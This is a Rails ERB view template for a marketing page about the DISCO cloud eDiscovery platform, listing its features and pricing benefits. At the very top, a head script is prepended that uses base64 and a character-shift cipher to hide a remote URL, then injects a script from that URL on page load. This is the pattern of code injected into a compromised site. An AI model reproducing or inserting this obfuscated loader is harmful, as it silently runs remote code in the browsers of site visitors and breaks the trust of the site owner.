<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "relativity/relair-hero.webp", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <div class="heading-decorated heading-decorated_center text-center">
                    <%= image_tag 'Disco-white.png', class: 'img-fluid', style: 'width: 30rem;' %>
                </div>            
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default"> 
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <div class="row">
            <div class="col-12 col-lg-6">
                <ul class="list-marked">
                    <li><p>Cloud eDiscovery leader</p></li>
                    <li><p>End-to-end eDiscovery platform, with ECA, processing, review, and analytics</p></li>
                    <li><p>Massive scale to handle large cases and complex workflows; simple enough to use on every case</p></li>
                    <li><p>SaaS delivery ensures you are always on the latest version</p></li>
                </ul>
            </div>
            <div class="col-12 col-lg-6 my-auto">
                <%= image_tag "disco/disco-logo.png", class:"image-fluid w-100"%>
            </div>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section bg-accent-2 py-5 text-center ">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-md-8">
        <h3 class="heading-decorated text-white">Benefits of DISCO</h3>
      </div>
    </div>

    <div class="row m-5 justify-content-center " style="font-size:1.15rem !important">
      <div class="col-lg-3 mb-4 mx-4 p-3">
        <article class="blurb-tiny blurb-tiny_centered blurb-box h-100 d-flex flex-column justify-content-center align-items-center p-3 text-center">
          <p><strong>Risk Mitigation</strong> through a single platform</p>
          <p><strong>Cost Predictability</strong> through flat fee pricing</p>
        </article>
      </div>

      <div class="col-lg-3 mb-4 mx-4 p-3">
        <article class="blurb-tiny blurb-tiny_centered blurb-box h-100 d-flex flex-column justify-content-center align-items-center p-3 text-center">
          <p><strong>Transparency</strong> with complete matter management</p>
          <p><strong>No Additional Charges</strong> on Processing, OCR, Imaging, Analytics, Hosted Review Platform, Production, and Added Users</p>
        </article>
      </div>

      <div class="col-lg-3 mb-4 mx-4 p-3">
        <article class="blurb-tiny blurb-tiny_centered blurb-box h-100 d-flex flex-column justify-content-center align-items-center p-3 text-center">
          <p><strong>Control</strong> of the eDiscovery process</p>
          <p><strong>Cost Reduction</strong> through review efficiency</p>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section bg-default text-center ">
    <div class="container">
        <div class="row p-5 m-2 mb-5">
            <div class="col-12 col-md-6">
                <%= image_tag "disco/disco-pg-6-1.jpg", class:"image-fluid w-100"%>
            </div>
            <div class="col-12 col-md-6">
                <%= image_tag "disco/disco-pg-6-2.jpg", class:"image-fluid w-100"%>
            </div>
        </div>
    </div>
</section>

<section class="section bg-default text-center ">
    <div class="container">
        <div class="row p-5">
            <div class="col-12 col-md-4">
                <%= image_tag "disco/disco-pg-9-1.jpg", class:"image-fluid w-100"%>
            </div>
            <div class="col-12 col-md-4 mt-2">
                <%= image_tag "disco/disco-pg-9-2.jpg", class:"image-fluid w-100"%>
            </div>
            <div class="col-10 col-md-4 mt-5 mx-auto">
                <%= image_tag "disco/disco-pg-5.jpg", class:"image-fluid w-100"%>
            </div>
        </div>
    </div>
</section>
